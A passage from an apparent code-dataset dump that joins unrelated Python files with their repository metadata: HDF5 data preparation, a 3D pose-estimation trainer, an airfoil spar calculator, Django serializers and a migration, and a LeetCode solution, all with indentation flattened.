y_reco = read_single_frame(reco_name, w, h)
w = width * (w // width)
h = height * (h // height)
y_orig = y_orig[:h, :w] / img_scale
y_reco = y_reco[:h, :w] / img_scale
diff = np.abs(y_orig - y_reco)
for y in range(0, h, height):
for x in range(0, w, width):
hf['input'][idx, :, :, 0] = y_orig[y:y + height, x:x + width]
hf['input'][idx, :, :, 1] = qp
hf['label'][idx, :, :, 0] = diff[y:y + height, x:x + width]
idx += 1
hf['input'].resize((idx + 1, height, width, 2))
hf['label'].resize((idx + 1, height, width, 1))
def prepare_rate_data(data_name, input_dir, label_dir, width, height, levels, model, h5_dir):
"""
Each line of a rate file includes:
x y rate-level-1 rate-level-2 ... rate-level-n
"""
file_name = '{0}_{1}_{2}x{3}.h5'.format(data_name, model, width, height)
file_name = os.path.join(h5_dir, file_name)
with h5py.File(file_name, 'w') as hf:
hf.create_dataset('input', (1, height, width, 1), maxshape=(None, height, width, 1))
hf.create_dataset('label', (1, levels), maxshape=(None, levels))
orig_frames = sorted(glob(os.path.join(input_dir, '*.yuv')))
rate_data = sorted(glob(os.path.join(label_dir, '*.txt')))
idx = 0
scale_factor = 2 ** 8 - 1.
global_max = -1
for i in range(len(orig_frames)):
data_ = {}
with open(rate_data[i], 'r') as file_:
for line in file_:
line_ = np.fromstring(line, dtype=int, sep=' ')
rates = line_[2:]
rates = rates.astype('float')
data_['{0}x{1}'.format(line_[0], line_[1])] = rates
global_max = max(global_max, np.max(rates))
w, h = shape_from_filename(orig_frames[i])
y_orig = read_single_frame(orig_frames[i], w, h)
w = width * (w // width)
h = height * (h // height)
y_orig = y_orig[:h, :w] / scale_factor
for y in range(0, h, height):
for x in range(0, w, width):
hf['input'][idx, :, :, 0] = y_orig[y:y + height, x:x + width]
hf['label'][idx, :] = data_['{0}x{1}'.format(x, y)]
idx += 1
hf['input'].resize((idx + 1, height, width, 1))
hf['label'].resize((idx + 1, levels))
hf.attrs['global_max'] = global_max
| [
"[email protected]"
] | |
44409bdac0a0b49c9b2be22d241b768ad0259208 | a84f01e6a2419cfa6e4aeaa42e211a7767769666 | /src/utils.py | edd8fa5bb5a8c005a678b71b91ce78d73e7d994f | [] | no_license | MarkusGW/trading_evolved | 4ad11b18b49763969e8132ff432da629a742301a | 90dd50c1e608f8dc9841ac29b4b5c6c1d72b0380 | refs/heads/master | 2023-01-14T03:59:15.320872 | 2020-11-22T12:08:08 | 2020-11-22T12:08:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 829 | py | import pandas as pd
from typing import List
idx = pd.date_range(start="1997-01-01", end="1997-01-10", tz="utc", freq="D")
EQUITIES = [
"JNJ",
"KO",
"AXP",
"HON",
"DIS",
"PG",
"INTC",
"AMGN",
"VZ",
"GS",
"UNH",
"CSCO",
"WMT",
"JPM",
"MRK",
"MCD",
"MMM",
"CVX",
"MSFT",
"TRV",
"CAT",
"WBA",
"DOW",
"V",
"CRM",
"NKE",
"IBM",
"BA",
"AAPL",
]
def generate_dummy_sp500_components(
start_date: str, end_date: str, components: List[str] = None
):
idx = pd.date_range(start=start_date, end=end_date, tz="utc", freq="D")
df = pd.DataFrame(index=idx)
if not components:
df["components"] = ",".join(EQUITIES)
else:
raise NotImplementedError("components must be None!")
return df
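# A minimal usage sketch (the dates are arbitrary examples):
#   df = generate_dummy_sp500_components("2020-01-01", "2020-01-31")
#   df["components"]  # the same comma-separated ticker string for every day
# This mimics a static index-membership table that a backtest can join against.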
| [
"[email protected]"
] | |
b6efe0490d8451eae030d3b8436a66669ef88d37 | 6b26161e09d76c265a628a9f985e25ce06d61f0f | /src/openpose-baseline/src/predict_3dpose.py | 43aa6ff5f4a8eb1fc5415ba63a4b457dbcb95689 | [
"MIT"
] | permissive | iamarcel/thesis | 362925af6549eac149b6c4c30b9f0f27f3c125e1 | ecbf8fbdce8ef54a85757eaf3dae7337c2b30581 | refs/heads/master | 2021-04-18T22:33:44.406582 | 2018-08-14T11:09:51 | 2018-08-14T11:09:51 | 126,800,975 | 2 | 0 | null | 2020-03-30T20:38:32 | 2018-03-26T08:55:35 | Python | UTF-8 | Python | false | false | 20,728 | py |
"""Predicting 3d poses from 2d joints"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import os
import random
import sys
import time
import h5py
import copy
import matplotlib.pyplot as plt
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
import procrustes
import viz
import cameras
import data_utils
import linear_model
tf.app.flags.DEFINE_float("learning_rate", 1e-3, "Learning rate")
tf.app.flags.DEFINE_float("dropout", 1, "Dropout keep probability. 1 means no dropout")
tf.app.flags.DEFINE_integer("batch_size", 64, "Batch size to use during training")
tf.app.flags.DEFINE_integer("epochs", 200, "How many epochs we should train for")
tf.app.flags.DEFINE_boolean("camera_frame", False, "Convert 3d poses to camera coordinates")
tf.app.flags.DEFINE_boolean("max_norm", False, "Apply maxnorm constraint to the weights")
tf.app.flags.DEFINE_boolean("batch_norm", False, "Use batch_normalization")
# Data loading
tf.app.flags.DEFINE_boolean("predict_14", False, "predict 14 joints")
tf.app.flags.DEFINE_boolean("use_sh", False, "Use 2d pose predictions from StackedHourglass")
tf.app.flags.DEFINE_string("action","All", "The action to train on. 'All' means all the actions")
# Architecture
tf.app.flags.DEFINE_integer("linear_size", 1024, "Size of each model layer.")
tf.app.flags.DEFINE_integer("num_layers", 2, "Number of layers in the model.")
tf.app.flags.DEFINE_boolean("residual", False, "Whether to add a residual connection every 2 layers")
# Evaluation
tf.app.flags.DEFINE_boolean("procrustes", False, "Apply procrustes analysis at test time")
tf.app.flags.DEFINE_boolean("evaluateActionWise",False, "The dataset to use either h36m or heva")
# Directories
tf.app.flags.DEFINE_string("cameras_path","data/h36m/cameras.h5","Directory to load camera parameters")
tf.app.flags.DEFINE_string("data_dir", "data/h36m/", "Data directory")
tf.app.flags.DEFINE_string("train_dir", "experiments", "Training directory.")
# openpose
tf.app.flags.DEFINE_string("openpose", "openpose_output", "openpose output Data directory")
tf.app.flags.DEFINE_integer("gif_fps", 30, "output gif framerate")
tf.app.flags.DEFINE_integer("verbose", 2, "0:Error, 1:Warning, 2:INFO*(default), 3:debug")
# Train or load
tf.app.flags.DEFINE_boolean("sample", False, "Set to True for sampling.")
tf.app.flags.DEFINE_boolean("use_cpu", False, "Whether to use the CPU")
tf.app.flags.DEFINE_integer("load", 0, "Try to load a previous checkpoint.")
# Misc
tf.app.flags.DEFINE_boolean("use_fp16", False, "Train using fp16 instead of fp32.")
FLAGS = tf.app.flags.FLAGS
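# A hypothetical invocation (flag values are illustrative, not prescriptive):
#   python predict_3dpose.py --camera_frame --residual --batch_norm --max_norm \
#     --evaluateActionWise --use_sh --epochs 200
# The train_dir built below encodes most of these flags, so runs with different
# settings are checkpointed into separate directories.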
train_dir = os.path.join( FLAGS.train_dir,
FLAGS.action,
'dropout_{0}'.format(FLAGS.dropout),
'epochs_{0}'.format(FLAGS.epochs) if FLAGS.epochs > 0 else '',
'lr_{0}'.format(FLAGS.learning_rate),
'residual' if FLAGS.residual else 'not_residual',
'depth_{0}'.format(FLAGS.num_layers),
'linear_size{0}'.format(FLAGS.linear_size),
'batch_size_{0}'.format(FLAGS.batch_size),
'procrustes' if FLAGS.procrustes else 'no_procrustes',
'maxnorm' if FLAGS.max_norm else 'no_maxnorm',
'batch_normalization' if FLAGS.batch_norm else 'no_batch_normalization',
'use_stacked_hourglass' if FLAGS.use_sh else 'not_stacked_hourglass',
'predict_14' if FLAGS.predict_14 else 'predict_17')
print( train_dir )
summaries_dir = os.path.join( train_dir, "log" ) # Directory for TB summaries
# To avoid race conditions: https://github.com/tensorflow/tensorflow/issues/7448
os.system('mkdir -p {}'.format(summaries_dir))
def create_model( session, actions, batch_size ):
"""
Create model and initialize it or load its parameters in a session
Args
session: tensorflow session
actions: list of string. Actions to train/test on
batch_size: integer. Number of examples in each batch
Returns
model: The created (or loaded) model
Raises
ValueError if asked to load a model, but the checkpoint specified by
FLAGS.load cannot be found.
"""
model = linear_model.LinearModel(
FLAGS.linear_size,
FLAGS.num_layers,
FLAGS.residual,
FLAGS.batch_norm,
FLAGS.max_norm,
batch_size,
FLAGS.learning_rate,
summaries_dir,
FLAGS.predict_14,
dtype=tf.float16 if FLAGS.use_fp16 else tf.float32)
if FLAGS.load <= 0:
# Create a new model from scratch
print("Creating model with fresh parameters.")
session.run( tf.global_variables_initializer() )
return model
# Load a previously saved model
ckpt = tf.train.get_checkpoint_state( train_dir, latest_filename="checkpoint")
print( "train_dir", train_dir )
if ckpt and ckpt.model_checkpoint_path:
# Check if the specific checkpoint exists
if FLAGS.load > 0:
if os.path.isfile(os.path.join(train_dir,"checkpoint-{0}.index".format(FLAGS.load))):
ckpt_name = os.path.join( os.path.join(train_dir,"checkpoint-{0}".format(FLAGS.load)) )
else:
raise ValueError("Asked to load checkpoint {0}, but it does not seem to exist".format(FLAGS.load))
else:
ckpt_name = os.path.basename( ckpt.model_checkpoint_path )
print("Loading model {0}".format( ckpt_name ))
model.saver.restore( session, ckpt.model_checkpoint_path )
return model
else:
print("Could not find checkpoint. Aborting.")
    raise ValueError( "Checkpoint in {0} does not seem to exist".format( train_dir ) )
return model
def train():
"""Train a linear model for 3d pose estimation"""
actions = data_utils.define_actions( FLAGS.action )
number_of_actions = len( actions )
# Load camera parameters
SUBJECT_IDS = [1,5,6,7,8,9,11]
rcams = cameras.load_cameras(FLAGS.cameras_path, SUBJECT_IDS)
# Load 3d data and load (or create) 2d projections
train_set_3d, test_set_3d, data_mean_3d, data_std_3d, dim_to_ignore_3d, dim_to_use_3d, train_root_positions, test_root_positions = data_utils.read_3d_data(
actions, FLAGS.data_dir, FLAGS.camera_frame, rcams, FLAGS.predict_14 )
# Read stacked hourglass 2D predictions if use_sh, otherwise use groundtruth 2D projections
if FLAGS.use_sh:
train_set_2d, test_set_2d, data_mean_2d, data_std_2d, dim_to_ignore_2d, dim_to_use_2d = data_utils.read_2d_predictions(actions, FLAGS.data_dir)
else:
train_set_2d, test_set_2d, data_mean_2d, data_std_2d, dim_to_ignore_2d, dim_to_use_2d = data_utils.create_2d_data( actions, FLAGS.data_dir, rcams )
print( "done reading and normalizing data." )
# Avoid using the GPU if requested
device_count = {"GPU": 0} if FLAGS.use_cpu else {"GPU": 1}
with tf.Session(config=tf.ConfigProto(
device_count=device_count,
allow_soft_placement=True )) as sess:
# === Create the model ===
print("Creating %d bi-layers of %d units." % (FLAGS.num_layers, FLAGS.linear_size))
model = create_model( sess, actions, FLAGS.batch_size )
model.train_writer.add_graph( sess.graph )
print("Model created")
#=== This is the training loop ===
step_time, loss, val_loss = 0.0, 0.0, 0.0
current_step = 0 if FLAGS.load <= 0 else FLAGS.load + 1
previous_losses = []
step_time, loss = 0, 0
current_epoch = 0
log_every_n_batches = 100
for _ in xrange( FLAGS.epochs ):
current_epoch = current_epoch + 1
# === Load training batches for one epoch ===
encoder_inputs, decoder_outputs = model.get_all_batches( train_set_2d, train_set_3d, FLAGS.camera_frame, training=True )
nbatches = len( encoder_inputs )
print("There are {0} train batches".format( nbatches ))
start_time, loss = time.time(), 0.
# === Loop through all the training batches ===
for i in range( nbatches ):
if (i+1) % log_every_n_batches == 0:
# Print progress every log_every_n_batches batches
print("Working on epoch {0}, batch {1} / {2}... ".format( current_epoch, i+1, nbatches), end="" )
enc_in, dec_out = encoder_inputs[i], decoder_outputs[i]
step_loss, loss_summary, lr_summary, _ = model.step( sess, enc_in, dec_out, FLAGS.dropout, isTraining=True )
if (i+1) % log_every_n_batches == 0:
# Log and print progress every log_every_n_batches batches
model.train_writer.add_summary( loss_summary, current_step )
model.train_writer.add_summary( lr_summary, current_step )
step_time = (time.time() - start_time)
start_time = time.time()
print("done in {0:.2f} ms".format( 1000*step_time / log_every_n_batches ) )
loss += step_loss
current_step += 1
# === end looping through training batches ===
loss = loss / nbatches
print("=============================\n"
"Global step: %d\n"
"Learning rate: %.2e\n"
"Train loss avg: %.4f\n"
"=============================" % (model.global_step.eval(),
model.learning_rate.eval(), loss) )
# === End training for an epoch ===
# === Testing after this epoch ===
isTraining = False
if FLAGS.evaluateActionWise:
print("{0:=^12} {1:=^6}".format("Action", "mm")) # line of 30 equal signs
cum_err = 0
for action in actions:
print("{0:<12} ".format(action), end="")
# Get 2d and 3d testing data for this action
action_test_set_2d = get_action_subset( test_set_2d, action )
action_test_set_3d = get_action_subset( test_set_3d, action )
encoder_inputs, decoder_outputs = model.get_all_batches( action_test_set_2d, action_test_set_3d, FLAGS.camera_frame, training=False)
act_err, _, step_time, loss = evaluate_batches( sess, model,
data_mean_3d, data_std_3d, dim_to_use_3d, dim_to_ignore_3d,
data_mean_2d, data_std_2d, dim_to_use_2d, dim_to_ignore_2d,
current_step, encoder_inputs, decoder_outputs )
cum_err = cum_err + act_err
print("{0:>6.2f}".format(act_err))
summaries = sess.run( model.err_mm_summary, {model.err_mm: float(cum_err/float(len(actions)))} )
model.test_writer.add_summary( summaries, current_step )
print("{0:<12} {1:>6.2f}".format("Average", cum_err/float(len(actions) )))
print("{0:=^19}".format(''))
else:
n_joints = 17 if not(FLAGS.predict_14) else 14
encoder_inputs, decoder_outputs = model.get_all_batches( test_set_2d, test_set_3d, FLAGS.camera_frame, training=False)
total_err, joint_err, step_time, loss = evaluate_batches( sess, model,
data_mean_3d, data_std_3d, dim_to_use_3d, dim_to_ignore_3d,
data_mean_2d, data_std_2d, dim_to_use_2d, dim_to_ignore_2d,
current_step, encoder_inputs, decoder_outputs, current_epoch )
print("=============================\n"
"Step-time (ms): %.4f\n"
"Val loss avg: %.4f\n"
"Val error avg (mm): %.2f\n"
"=============================" % ( 1000*step_time, loss, total_err ))
for i in range(n_joints):
# 6 spaces, right-aligned, 5 decimal places
print("Error in joint {0:02d} (mm): {1:>5.2f}".format(i+1, joint_err[i]))
print("=============================")
# Log the error to tensorboard
summaries = sess.run( model.err_mm_summary, {model.err_mm: total_err} )
model.test_writer.add_summary( summaries, current_step )
# Save the model
print( "Saving the model... ", end="" )
start_time = time.time()
model.saver.save(sess, os.path.join(train_dir, 'checkpoint'), global_step=current_step )
print( "done in {0:.2f} ms".format(1000*(time.time() - start_time)) )
# Reset global time and loss
step_time, loss = 0, 0
sys.stdout.flush()
def get_action_subset( poses_set, action ):
"""
Given a preloaded dictionary of poses, load the subset of a particular action
Args
poses_set: dictionary with keys k=(subject, action, seqname),
values v=(nxd matrix of poses)
action: string. The action that we want to filter out
Returns
poses_subset: dictionary with same structure as poses_set, but only with the
specified action.
"""
return {k:v for k, v in poses_set.items() if k[1] == action}
def evaluate_batches( sess, model,
data_mean_3d, data_std_3d, dim_to_use_3d, dim_to_ignore_3d,
data_mean_2d, data_std_2d, dim_to_use_2d, dim_to_ignore_2d,
current_step, encoder_inputs, decoder_outputs, current_epoch=0 ):
"""
Generic method that evaluates performance of a list of batches.
May be used to evaluate all actions or a single action.
Args
sess
model
data_mean_3d
data_std_3d
dim_to_use_3d
dim_to_ignore_3d
data_mean_2d
data_std_2d
dim_to_use_2d
dim_to_ignore_2d
current_step
encoder_inputs
decoder_outputs
current_epoch
Returns
total_err
joint_err
step_time
loss
"""
n_joints = 17 if not(FLAGS.predict_14) else 14
nbatches = len( encoder_inputs )
# Loop through test examples
all_dists, start_time, loss = [], time.time(), 0.
log_every_n_batches = 100
for i in range(nbatches):
if current_epoch > 0 and (i+1) % log_every_n_batches == 0:
print("Working on test epoch {0}, batch {1} / {2}".format( current_epoch, i+1, nbatches) )
enc_in, dec_out = encoder_inputs[i], decoder_outputs[i]
dp = 1.0 # dropout keep probability is always 1 at test time
step_loss, loss_summary, poses3d = model.step( sess, enc_in, dec_out, dp, isTraining=False )
loss += step_loss
# denormalize
enc_in = data_utils.unNormalizeData( enc_in, data_mean_2d, data_std_2d, dim_to_ignore_2d )
dec_out = data_utils.unNormalizeData( dec_out, data_mean_3d, data_std_3d, dim_to_ignore_3d )
poses3d = data_utils.unNormalizeData( poses3d, data_mean_3d, data_std_3d, dim_to_ignore_3d )
# Keep only the relevant dimensions
dtu3d = np.hstack( (np.arange(3), dim_to_use_3d) ) if not(FLAGS.predict_14) else dim_to_use_3d
dec_out = dec_out[:, dtu3d]
poses3d = poses3d[:, dtu3d]
assert dec_out.shape[0] == FLAGS.batch_size
assert poses3d.shape[0] == FLAGS.batch_size
if FLAGS.procrustes:
# Apply per-frame procrustes alignment if asked to do so
for j in range(FLAGS.batch_size):
gt = np.reshape(dec_out[j,:],[-1,3])
out = np.reshape(poses3d[j,:],[-1,3])
_, Z, T, b, c = procrustes.compute_similarity_transform(gt,out,compute_optimal_scale=True)
out = (b*out.dot(T))+c
poses3d[j,:] = np.reshape(out,[-1,17*3] ) if not(FLAGS.predict_14) else np.reshape(out,[-1,14*3] )
# Compute Euclidean distance error per joint
sqerr = (poses3d - dec_out)**2 # Squared error between prediction and expected output
dists = np.zeros( (sqerr.shape[0], n_joints) ) # Array with L2 error per joint in mm
dist_idx = 0
for k in np.arange(0, n_joints*3, 3):
# Sum across X,Y, and Z dimenstions to obtain L2 distance
dists[:,dist_idx] = np.sqrt( np.sum( sqerr[:, k:k+3], axis=1 ))
dist_idx = dist_idx + 1
all_dists.append(dists)
assert sqerr.shape[0] == FLAGS.batch_size
step_time = (time.time() - start_time) / nbatches
loss = loss / nbatches
all_dists = np.vstack( all_dists )
# Error per joint and total for all passed batches
joint_err = np.mean( all_dists, axis=0 )
total_err = np.mean( all_dists )
return total_err, joint_err, step_time, loss
def sample():
"""Get samples from a model and visualize them"""
actions = data_utils.define_actions( FLAGS.action )
# Load camera parameters
SUBJECT_IDS = [1,5,6,7,8,9,11]
rcams = cameras.load_cameras(FLAGS.cameras_path, SUBJECT_IDS)
# Load 3d data and load (or create) 2d projections
train_set_3d, test_set_3d, data_mean_3d, data_std_3d, dim_to_ignore_3d, dim_to_use_3d, train_root_positions, test_root_positions = data_utils.read_3d_data(
actions, FLAGS.data_dir, FLAGS.camera_frame, rcams, FLAGS.predict_14 )
if FLAGS.use_sh:
train_set_2d, test_set_2d, data_mean_2d, data_std_2d, dim_to_ignore_2d, dim_to_use_2d = data_utils.read_2d_predictions(actions, FLAGS.data_dir)
else:
train_set_2d, test_set_2d, data_mean_2d, data_std_2d, dim_to_ignore_2d, dim_to_use_2d = data_utils.create_2d_data( actions, FLAGS.data_dir, rcams )
print( "done reading and normalizing data." )
device_count = {"GPU": 0} if FLAGS.use_cpu else {"GPU": 1}
with tf.Session(config=tf.ConfigProto( device_count = device_count )) as sess:
# === Create the model ===
print("Creating %d layers of %d units." % (FLAGS.num_layers, FLAGS.linear_size))
batch_size = 128
model = create_model(sess, actions, batch_size)
print("Model loaded")
for key2d in test_set_2d.keys():
(subj, b, fname) = key2d
print( "Subject: {}, action: {}, fname: {}".format(subj, b, fname) )
# keys should be the same if 3d is in camera coordinates
key3d = key2d if FLAGS.camera_frame else (subj, b, '{0}.h5'.format(fname.split('.')[0]))
key3d = (subj, b, fname[:-3]) if (fname.endswith('-sh')) and FLAGS.camera_frame else key3d
enc_in = test_set_2d[ key2d ]
n2d, _ = enc_in.shape
dec_out = test_set_3d[ key3d ]
n3d, _ = dec_out.shape
assert n2d == n3d
# Split into about-same-size batches
enc_in = np.array_split( enc_in, n2d // batch_size )
dec_out = np.array_split( dec_out, n3d // batch_size )
all_poses_3d = []
for bidx in range( len(enc_in) ):
# Dropout probability 0 (keep probability 1) for sampling
dp = 1.0
_, _, poses3d = model.step(sess, enc_in[bidx], dec_out[bidx], dp, isTraining=False)
# denormalize
enc_in[bidx] = data_utils.unNormalizeData( enc_in[bidx], data_mean_2d, data_std_2d, dim_to_ignore_2d )
dec_out[bidx] = data_utils.unNormalizeData( dec_out[bidx], data_mean_3d, data_std_3d, dim_to_ignore_3d )
poses3d = data_utils.unNormalizeData( poses3d, data_mean_3d, data_std_3d, dim_to_ignore_3d )
all_poses_3d.append( poses3d )
# Put all the poses together
enc_in, dec_out, poses3d = map( np.vstack, [enc_in, dec_out, all_poses_3d] )
# Convert back to world coordinates
if FLAGS.camera_frame:
N_CAMERAS = 4
N_JOINTS_H36M = 32
# Add global position back
dec_out = dec_out + np.tile( test_root_positions[ key3d ], [1,N_JOINTS_H36M] )
# Load the appropriate camera
subj, _, sname = key3d
cname = sname.split('.')[1] # <-- camera name
scams = {(subj,c+1): rcams[(subj,c+1)] for c in range(N_CAMERAS)} # cams of this subject
scam_idx = [scams[(subj,c+1)][-1] for c in range(N_CAMERAS)].index( cname ) # index of camera used
the_cam = scams[(subj, scam_idx+1)] # <-- the camera used
R, T, f, c, k, p, name = the_cam
assert name == cname
def cam2world_centered(data_3d_camframe):
data_3d_worldframe = cameras.camera_to_world_frame(data_3d_camframe.reshape((-1, 3)), R, T)
data_3d_worldframe = data_3d_worldframe.reshape((-1, N_JOINTS_H36M*3))
# subtract root translation
return data_3d_worldframe - np.tile( data_3d_worldframe[:,:3], (1,N_JOINTS_H36M) )
# Apply inverse rotation and translation
dec_out = cam2world_centered(dec_out)
poses3d = cam2world_centered(poses3d)
# Grab a random batch to visualize
enc_in, dec_out, poses3d = map( np.vstack, [enc_in, dec_out, poses3d] )
idx = np.random.permutation( enc_in.shape[0] )
enc_in, dec_out, poses3d = enc_in[idx, :], dec_out[idx, :], poses3d[idx, :]
# Visualize random samples
import matplotlib.gridspec as gridspec
# 1080p = 1,920 x 1,080
fig = plt.figure( figsize=(19.2, 10.8) )
gs1 = gridspec.GridSpec(5, 9) # 5 rows, 9 columns
gs1.update(wspace=-0.00, hspace=0.05) # set the spacing between axes.
plt.axis('off')
subplot_idx, exidx = 1, 1
nsamples = 15
for i in np.arange( nsamples ):
# Plot 2d pose
ax1 = plt.subplot(gs1[subplot_idx-1])
p2d = enc_in[exidx,:]
viz.show2Dpose( p2d, ax1 )
ax1.invert_yaxis()
# Plot 3d gt
ax2 = plt.subplot(gs1[subplot_idx], projection='3d')
p3d = dec_out[exidx,:]
viz.show3Dpose( p3d, ax2 )
# Plot 3d predictions
ax3 = plt.subplot(gs1[subplot_idx+1], projection='3d')
p3d = poses3d[exidx,:]
viz.show3Dpose( p3d, ax3, lcolor="#9b59b6", rcolor="#2ecc71" )
exidx = exidx + 1
subplot_idx = subplot_idx + 3
plt.show()
def main(_):
if FLAGS.sample:
sample()
else:
train()
if __name__ == "__main__":
tf.app.run()
| [
"[email protected]"
] | |
95d818af2f4d1b2556855c88d57e7be0018bcf71 | 4248fdd3d9791f74f4d2be799f4fe5547e5d59ce | /HeightofSparNonSymm.py | 41a5c0c67ba7ae9d4759d459bd7f60e8545893f6 | [] | no_license | rcbeneduce/TritonUAS | d8afe407c48c8853929af22af80f8d957c559eb6 | e3dcc0d9cd01c5587dd3add4493b68950644c2a1 | refs/heads/main | 2023-03-02T00:57:11.820777 | 2021-02-07T19:35:30 | 2021-02-07T19:35:30 | 331,475,699 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,396 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jan 20 08:15:12 2021
@author: Ryan
"""
#For Triton UAS
#determination of max height of Spar at desired locations
#source equations found at:
#airfoiltools.com/airfoil/naca4digit
#nonsymmetrical airfoils only
#see other file for symmetrical airfoils
#symmetrical airfoils will contain a 00 at the beginning
import math
NACA=list("2424") #full 4-digit NACA airfoil, given as a string so leading zeros are kept (symmetrical 00XX airfoils are handled in the other file)
M=int(NACA[0])/100 #max camber
P=int(NACA[1])/10 #position of max camber
T=int(NACA[2]+NACA[3])/100 #thickness
#Yt calulcation
c=1 #chord length
ao=.2969
a1=-.126
a2=-.3516
a3=.2843
a4=-.1015 #-.1015 for the standard (open) trailing edge, or -.1036 for a closed trailing edge
x=.2 #at what length of the span? (0-1 range of values)
yt=T*5*c*(ao*(x/c)**.5+a1*x/c+a2*(x/c)**2+a3*(x/c)**3+a4*(x/c)**4)
#Yc calculation
#Gradient Calculation
#iteration between values of desired x and position of max camber
if (x<P*c):
yc=((M*x)/P**2)*(2*P-(x/c)) #camber
dycdx=(2*M/P**2)*(P-(x/c)) #gradient
elif (x>=P*c):
yc=(M*(c-x))/(1-P)**2*(1+(x/c)-2*P) #camber
dycdx=(2*M/(1-P)**2)*(P-(x/c)) #gradient
#theta and upper/lower surface calcs
theta=math.atan(dycdx)
xu=x-yt*math.sin(theta) #upper bound x
xl=x+yt*math.sin(theta) #lower bound x
yu=yc+yt*math.cos(theta) #upper bound y
yl=yc-yt*math.cos(theta) #lower bound y
print("At position x=",x,"The max spar height is=",(yu-yl))
| [
"[email protected]"
] | |
7e326e95b2f215277fad954226ecacab2de1fc80 | ff861e42ddc870274000de686665c8c8430a05b9 | /news/news_api/serializers.py | 9103a96e3c54ccfc85ffe44cdcfccb5943f225bf | [] | no_license | vkhalaim/develops_test | c312b8e9261a4dab0cd6417e0bbee5b2d280b5b8 | 2492c2b8181dc1cc4e27876e9aa8ed76c19ee641 | refs/heads/master | 2022-12-07T08:27:52.272297 | 2020-09-03T10:02:06 | 2020-09-03T10:02:06 | 292,081,779 | 0 | 0 | null | 2020-09-02T17:06:07 | 2020-09-01T18:52:44 | Python | UTF-8 | Python | false | false | 728 | py | from rest_framework import serializers
from .models import Post, Comment
class PostSerializer(serializers.ModelSerializer):
comments = serializers.HyperlinkedRelatedField(
many=True, read_only=True, view_name="comments-detail"
)
class Meta:
model = Post
fields = [
"title",
"link",
"creation_date",
"upvotes",
"author",
"comments",
]
read_only_fields = [
"votes",
]
class CommentSerializer(serializers.ModelSerializer):
class Meta:
model = Comment
fields = [
"author",
"content",
"created",
"post",
]
| [
"[email protected]"
] | |
8d709de8cf0a40a56f67797e504889b8262839ae | f3ac8922bf8b8358c117825975c25b43ac342c07 | /TestDatas/Common_Datas.py | 1ea84d5e89f3d23e37504fdae10547127ec2ea92 | [] | no_license | tangtangmao/KetangpaiWebtest | be176c8048e9036cc99a5a974f93dc85bd764f32 | 34683dbe5cd8254d217023214836654114e5e1b2 | refs/heads/master | 2022-04-26T22:09:27.096734 | 2020-04-29T07:20:08 | 2020-04-29T07:20:08 | 256,442,839 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 237 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
#@Time : 2020/4/4 11:16
#@Author: hxj
#@File : Common_Datas.py
#用来存放一些公共的全局配置
#全局的系统访问地址,登陆连接
web_login_url="https://www.ketangpai.com/" | [
"[email protected]"
] | |
bb474a8dff0c79f39dff9351ec66adbebf334cc2 | e5eb6503958f794aaba90636b3415564e984e2d8 | /datamodel/migrations/0015_auto_20191212_1501.py | dddb54ff4581f68fae0ad7bed903b0109ba060b9 | [] | no_license | AdrianCV412/PSI_Extraordinaria | 4005217c61e9d88538be21911fa6367e365190ec | 5e3da07c7d71c1c817445ae73d02c5c07284d7ab | refs/heads/master | 2023-07-22T07:37:53.022367 | 2020-06-11T11:05:14 | 2020-06-11T11:05:14 | 269,599,552 | 0 | 0 | null | 2021-06-10T22:59:50 | 2020-06-05T10:22:24 | Python | UTF-8 | Python | false | false | 391 | py | # Generated by Django 2.2.7 on 2019-12-12 15:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('datamodel', '0014_auto_20191210_1713'),
]
operations = [
migrations.AlterField(
model_name='move',
name='date',
field=models.DateField(default='2019-12-12'),
),
]
| [
"[email protected]"
] | |
f1a26d8535ee4e801718164bb5381dda69821129 | a9fe1b5c320cdef138ac4a942a8b741c7f27de7c | /LC1165-Single-Row-Keyboard.py | b61ee59f2cb456449c1170110439d12eae92960f | [] | no_license | kate-melnykova/LeetCode-solutions | a6bbb5845310ce082770bcb92ef6f6877962a8ee | ee8237b66975fb5584a3d68b311e762c0462c8aa | refs/heads/master | 2023-06-28T06:35:33.342025 | 2021-07-30T06:59:31 | 2021-07-30T06:59:31 | 325,106,033 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,221 | py | """
There is a special keyboard with all keys in a single row.
Given a string keyboard of length 26 indicating the layout of
the keyboard (indexed from 0 to 25), initially your finger is
at index 0. To type a character, you have to move your finger
to the index of the desired character. The time taken to move
your finger from index i to index j is |i - j|.
You want to type a string word. Write a function to calculate
how much time it takes to type it with one finger.
Example 1:
Input: keyboard = "abcdefghijklmnopqrstuvwxyz", word = "cba"
Output: 4
Explanation: The index moves from 0 to 2 to write 'c' then to 1
to write 'b' then to 0 again to write 'a'.
Total time = 2 + 1 + 1 = 4.
Example 2:
Input: keyboard = "pqrstuvwxyzabcdefghijklmno", word = "leetcode"
Output: 73
Constraints:
(*) keyboard.length == 26
(*) keyboard contains each English lowercase letter exactly once in some order.
(*) 1 <= word.length <= 10^4
(*) word[i] is an English lowercase letter.
"""
class Solution:
def calculateTime(self, keyboard: str, word: str) -> int:
"""
Runtime complexity: O(n)
Space complexity: O(n)
"""
locations = {key: i for i, key in enumerate(keyboard)}
loc = 0
dist = 0
for char in word:
dist += abs(loc - locations[char])
loc = locations[char]
return dist
def calculateTimeNoSpace(self, keyboard: str, word: str) -> int:
"""
Runtime complexity: O(n^2)
Space complexity: O(1)
"""
self.keyboard = keyboard
loc = 0
dist = 0
for char in word:
new_loc = self._get_loc(char)
dist += abs(loc - new_loc)
loc = new_loc
return dist
def _get_loc(self, char: str):
return self.keyboard.index(char)
if __name__ == '__main__':
from run_tests import run_tests
correct_answers = [
["abcdefghijklmnopqrstuvwxyz", "cba", 4],
["pqrstuvwxyzabcdefghijklmno", "leetcode", 73]
]
methods = ['calculateTime', 'calculateTimeNoSpace']
for method in methods:
print(f'Running tests for {method}')
run_tests(getattr(Solution(), method), correct_answers) | [
"[email protected]"
] | |
